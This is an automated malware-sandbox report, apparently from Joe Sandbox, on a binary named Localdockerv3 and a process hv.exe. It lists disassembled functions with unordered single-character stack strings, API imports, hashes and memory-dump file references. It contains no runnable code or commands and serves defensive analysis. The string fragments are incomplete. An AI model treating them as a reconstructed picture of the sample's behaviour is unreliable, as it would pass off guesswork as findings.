API String ID: 2941638530-457946424
Opcode ID: 3236d887c71168098ea76fec8f1f99091adbadb1fc60211c25e4cae7499078e8
Instruction ID: 20116706675992dc0dd6a543d8b96af0499e673c97be450d8ca5d57fafb5b745
Opcode Fuzzy Hash: 3236d887c71168098ea76fec8f1f99091adbadb1fc60211c25e4cae7499078e8
Instruction Fuzzy Hash: 28B1A272215A4182EA62DB2AE8417EA7360FB8DBF4F444212AF6D476F5DF78C845CB40

Function 00000001400147C8 Relevance: 112.7, Strings: 90, Instructions: 240COMMON

Download Yara Rule

Strings

r, xrefs: 0000000140014BEB
o, xrefs: 0000000140014BFA
, xrefs: 0000000140014A28
a, xrefs: 0000000140014B88
s, xrefs: 00000001400149E1
F, xrefs: 0000000140014BF5
, xrefs: 0000000140014AD8
\, xrefs: 0000000140014886
:, xrefs: 0000000140014BA8
u, xrefs: 0000000140014BFF
, xrefs: 00000001400149EB
b, xrefs: 0000000140014BD2
r, xrefs: 0000000140014B80
g, xrefs: 0000000140014BDC
_, xrefs: 000000014001486D
i, xrefs: 0000000140014AA0
r, xrefs: 0000000140014B28
e, xrefs: 0000000140014A04
m, xrefs: 0000000140014B90
l, xrefs: 00000001400149F5
e, xrefs: 0000000140014B08
t, xrefs: 0000000140014AB8
e, xrefs: 00000001400149E6
c, xrefs: 00000001400149F0
r, xrefs: 0000000140014B68
a, xrefs: 0000000140014A80
a, xrefs: 0000000140014B20
_, xrefs: 0000000140014859
p, xrefs: 0000000140014863
e, xrefs: 0000000140014BE6
r, xrefs: 0000000140014A20
p, xrefs: 0000000140014A90
m, xrefs: 0000000140014872
i, xrefs: 0000000140014AC0
o, xrefs: 00000001400149FA
b, xrefs: 0000000140014A40
t, xrefs: 0000000140014B30
, xrefs: 0000000140014B58
u, xrefs: 0000000140014A18
f, xrefs: 000000014001487C
-, xrefs: 0000000140014BB0
, xrefs: 0000000140014A78
d, xrefs: 0000000140014AF0
o, xrefs: 0000000140014A13
), xrefs: 0000000140014BB8
e, xrefs: 0000000140014BCD
g, xrefs: 0000000140014BE1
p, xrefs: 0000000140014868
p, xrefs: 0000000140014A88
n, xrefs: 0000000140014AE8
g, xrefs: 0000000140014B78
e, xrefs: 0000000140014A38
g, xrefs: 0000000140014A58
d, xrefs: 0000000140014C09
y, xrefs: 0000000140014A0E
s, xrefs: 00000001400149FF
r, xrefs: 0000000140014B00
u, xrefs: 0000000140014A48
e, xrefs: 0000000140014B50
D, xrefs: 0000000140014BC8
, xrefs: 0000000140014A09
o, xrefs: 0000000140014AC8
c, xrefs: 000000014001485E
l, xrefs: 0000000140014A98
n, xrefs: 0000000140014AD0
", xrefs: 0000000140014B98
, xrefs: 0000000140014BF0
o, xrefs: 0000000140014B70
g, xrefs: 0000000140014A70
a, xrefs: 0000000140014AB0
s, xrefs: 0000000140014B10
" D, xrefs: 0000000140014C20
, xrefs: 0000000140014B38
p, xrefs: 0000000140014B60
h, xrefs: 0000000140014B48
t, xrefs: 0000000140014B40
c, xrefs: 0000000140014AA8
, xrefs: 0000000140014AF8
a, xrefs: 0000000140014AE0
n, xrefs: 0000000140014C04
n, xrefs: 0000000140014A68
a, xrefs: 00000001400149DC
g, xrefs: 0000000140014A50
!, xrefs: 0000000140014C0E
u, xrefs: 0000000140014BD7
t, xrefs: 0000000140014B18
:, xrefs: 0000000140014881
i, xrefs: 0000000140014A60
d, xrefs: 0000000140014A30
e, xrefs: 00000001400149D7

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $ $ $!$"$" D$)$-$:$:$D$F$\$_$_$a$a$a$a$a$a$b$b$c$c$c$d$d$d$e$e$e$e$e$e$e$e$f$g$g$g$g$g$g$h$i$i$i$l$l$m$m$n$n$n$n$o$o$o$o$o$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$u$u$u$u$y
API String ID: 0-1553105431
Opcode ID: b62bcd70555ecac178921fb69db0b916aa94a9461a52cd8312cf5ed454835745
Instruction ID: 983b50228ff67007349c82ebe3df00fbbaa8400b1fc6e134e4c4d14ededc4b65
Opcode Fuzzy Hash: b62bcd70555ecac178921fb69db0b916aa94a9461a52cd8312cf5ed454835745
Instruction Fuzzy Hash: BAD1042210C7C0C9E722C739E45839BBF91E396758F084149A7D84BAEACBBFD454CB61

Function 000000014001463C Relevance: 36.3, Strings: 29, Instructions: 95COMMON

Download Yara Rule

Strings

K, xrefs: 000000014001465B
., xrefs: 0000000140014683
r, xrefs: 000000014001471E
g, xrefs: 000000014001470A
e, xrefs: 000000014001466F
g, xrefs: 0000000140014705
r, xrefs: 0000000140014665
l, xrefs: 000000014001468D
3, xrefs: 0000000140014679
l, xrefs: 0000000140014674
s, xrefs: 00000001400146EC
e, xrefs: 000000014001472D
r, xrefs: 0000000140014714
b, xrefs: 00000001400146FB
d, xrefs: 0000000140014688
n, xrefs: 0000000140014732
e, xrefs: 0000000140014723
n, xrefs: 000000014001466A
2, xrefs: 000000014001467E
e, xrefs: 00000001400146F6
l, xrefs: 0000000140014692
I, xrefs: 00000001400146E7
e, xrefs: 000000014001470F
t, xrefs: 0000000140014737
e, xrefs: 0000000140014660
s, xrefs: 0000000140014728
D, xrefs: 00000001400146F1
u, xrefs: 0000000140014700
P, xrefs: 0000000140014719

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID:
String ID: .$2$3$D$I$K$P$b$d$e$e$e$e$e$e$g$g$l$l$l$n$n$r$r$r$s$s$t$u
API String ID: 0-1371980272
Opcode ID: 83936a6e60971807bd9a841582d71c7bc9abb7deebbfde0675ab1a4d8166ddc1
Instruction ID: ebb7062b7830e2f6201c3ee88f5bab5457eb83f6b9f17b420c99f5bab9962169
Opcode Fuzzy Hash: 83936a6e60971807bd9a841582d71c7bc9abb7deebbfde0675ab1a4d8166ddc1
Instruction Fuzzy Hash: 8C41542210C7C085F752C769E40435ABFD1D796BA8F080159A7D90B6EACBFFC448CB21

Function 0000000140026470 Relevance: 27.7, Strings: 22, Instructions: 177COMMON

Download Yara Rule

Strings

:, xrefs: 000000014002650D
s, xrefs: 0000000140026530
w, xrefs: 000000014002651C
o, xrefs: 0000000140026535
e, xrefs: 0000000140026553
/, xrefs: 0000000140026517
w, xrefs: 0000000140026526
f, xrefs: 000000014002653A
h, xrefs: 00000001400264F9
., xrefs: 0000000140026562
k, xrefs: 000000014002655D
w, xrefs: 0000000140026521
r, xrefs: 000000014002654E
., xrefs: 000000014002652B
p, xrefs: 0000000140026508
t, xrefs: 0000000140026503
t, xrefs: 00000001400264FE
/, xrefs: 0000000140026512
w, xrefs: 0000000140026544
o, xrefs: 0000000140026558
t, xrefs: 000000014002653F
a, xrefs: 0000000140026549

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID:
String ID: .$.$/$/$:$a$e$f$h$k$o$o$p$r$s$t$t$t$w$w$w$w
API String ID: 0-3163616504
Opcode ID: aab7ac65e11725551885da5ed400cf90207c0651e7c005d705e4ff692bcd86c7
Instruction ID: 605818b88a422d67cb553fba9621f2b72a2fa53064d5ecd022150907ca5edf59
Opcode Fuzzy Hash: aab7ac65e11725551885da5ed400cf90207c0651e7c005d705e4ff692bcd86c7
Instruction Fuzzy Hash: 5481913220868086E752CB3AE8487DD77A5F389BD8F584215F79C476BACB7DC949CB10

Function 00000001400198D0 Relevance: 11.6, Strings: 9, Instructions: 324COMMON

Download Yara Rule

Strings

h, xrefs: 0000000140019B2F
l, xrefs: 0000000140019B65
:, xrefs: 0000000140019B70
t, xrefs: 0000000140019B41
7, xrefs: 0000000140019AD3
M, xrefs: 0000000140019B04
s, xrefs: 0000000140019B1D
m, xrefs: 0000000140019B0B
m, xrefs: 0000000140019B53

Memory Dump Source

Source File: 00000008.00000002.2171334550.0000000140001000.00000020.00000001.01000000.0000000D.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000008.00000002.2171292207.0000000140000000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_140000000_Localdockerv3.jbxd

Similarity

API ID:
String ID: 7$:$M$h$l$m$m$s$t
API String ID: 0-774144524
Opcode ID: b7f5465834f6e590c0bbed4cce9958aad9cdde72733777f65dba2b1614c7fcd9
Instruction ID: 78b4388999416cd18bfcb0f14d0a6cd4aa7666f392b8eb34da5cf203a5b0034f
Opcode Fuzzy Hash: b7f5465834f6e590c0bbed4cce9958aad9cdde72733777f65dba2b1614c7fcd9
Instruction Fuzzy Hash: 99E1B432208A8481EB62DF66E4443ED77A5F788BD4F548116EB4A5F7B8CF7AC884C741

Analysis Process: hv.exePID: 1612, Parent PID: 4084COMMON

Non-executed Functions

Function 6C452330 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

#214.IEPDF32(?), ref: 6C45248D
#214.IEPDF32(?,?,?), ref: 6C45263A

Strings

Rect, xrefs: 6C4526D7
Subtype, xrefs: 6C452530
Link, xrefs: 6C452548

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID: #214
String ID: Link$Rect$Subtype
API String ID: 1405426997-3862875103
Opcode ID: 8fc95c778f80179e43c526f8de443ea39d1e17619e10805c7733a772d62acdb7
Instruction ID: 9001b9e776958e42f57630e008eb6bcd7e5e34e65f12def1ac016b318cc51885
Opcode Fuzzy Hash: 8fc95c778f80179e43c526f8de443ea39d1e17619e10805c7733a772d62acdb7
Instruction Fuzzy Hash: E0C10331B0121D9FDF14DF68C894DAEB7B5EF89218B50002AD816AB781DF30AD09CBA1

Function 6C44D760 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 385COMMON

Download Yara Rule

APIs

#73.IEPDF32(?), ref: 6C44D777

Part of subcall function 6C44CEE0: #70.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6C44CEEB

#73.IEPDF32(?), ref: 6C44D80A
#73.IEPDF32(00000000,?,?,Rect), ref: 6C44D915

Strings

Rect, xrefs: 6C44D8F7, 6C44DAD0
BBox, xrefs: 6C44D98A, 6C44DA00

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID:
String ID: BBox$Rect
API String ID: 0-3854271352
Opcode ID: f4cc5b151381497d025b84d08c1a24e7c3ed6422dc2a38c4ab73612931429f2b
Instruction ID: 845ada3ecd92e9026a1491ab08feeac04a1e7c925678495765e0a5a027b7ce86
Opcode Fuzzy Hash: f4cc5b151381497d025b84d08c1a24e7c3ed6422dc2a38c4ab73612931429f2b
Instruction Fuzzy Hash: 27C1E871B012099FEB14DF65CC90EAEB7B5FF89714F204528E959ABB40DB30E905CBA1

Function 6C44E610 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

Type, xrefs: 6C44F1E9
Annot, xrefs: 6C44F201

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID:
String ID: Annot$Type
API String ID: 0-395718979
Opcode ID: 21732b869bcfffffa66e00acb4bb8b8ed9666215e896b565aa469c2a62ee84b3
Instruction ID: a628ba9c5b3909a8847bb77c4ccbfd904e51f8a6ea1066eb591d22f18a05202c
Opcode Fuzzy Hash: 21732b869bcfffffa66e00acb4bb8b8ed9666215e896b565aa469c2a62ee84b3
Instruction Fuzzy Hash: 1AB1D275B002198FFB14CF65C890EAEB7B5FF89305F108969D959ABB40EB309D06CB91

Function 6C453AB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7AB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825551368.000000006C7AF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825601329.000000006C7B3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825636765.000000006C7BB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1825668062.000000006C7BF000.00000020.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c370000_hv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dcd975d80199fa8ef3c21e251dca6b5d8c2ff4c516a222f2ca923243a9ea18
Instruction ID: 25571dfb8656054cd84d7cdcbc80763cd2451335b623a6c12dda77e7019ee50b
Opcode Fuzzy Hash: 05dcd975d80199fa8ef3c21e251dca6b5d8c2ff4c516a222f2ca923243a9ea18
Instruction Fuzzy Hash: 4A81C131B017198FDB00DF79C880F6AB7B5AF89215F504629EA15ABB40EB30E855CBA1

Function 6C42FC6C Relevance: 15.1, APIs: 10, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SetStretchBltMode.GDI32(00000000,00000004), ref: 6C42FC9B
GetObjectType.GDI32(?), ref: 6C42FCA4
CreateBitmap.GDI32 ref: 6C42FCD3
SelectObject.GDI32(?,00000000), ref: 6C42FCDD
GetObjectW.GDI32(00000000,00000018,?), ref: 6C42FCFD
SelectObject.GDI32(?,00000000), ref: 6C42FD21
DeleteObject.GDI32(00000000), ref: 6C42FD28
GetDeviceCaps.GDI32(?,0000000C), ref: 6C42FD3B
GetDeviceCaps.GDI32(?,00000008), ref: 6C42FD45
GetDeviceCaps.GDI32(?,0000000A), ref: 6C42FD4F

Memory Dump Source

Source File: 00000009.00000002.1820890807.000000006C426000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C370000, based on PE: true

Associated: 00000009.00000002.1820865224.000000006C370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C37A000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4B4000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E3000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4E7000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1820890807.000000006C4F6000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5DA000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C5FB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C605000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C672000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C686000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C68E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C69B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C6CF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C706000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C71C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C735000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C75A000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C76F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C794000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.1824660310.000000006C7A7000.00000002.00000001.01000000.00000009.sdmpDownload File
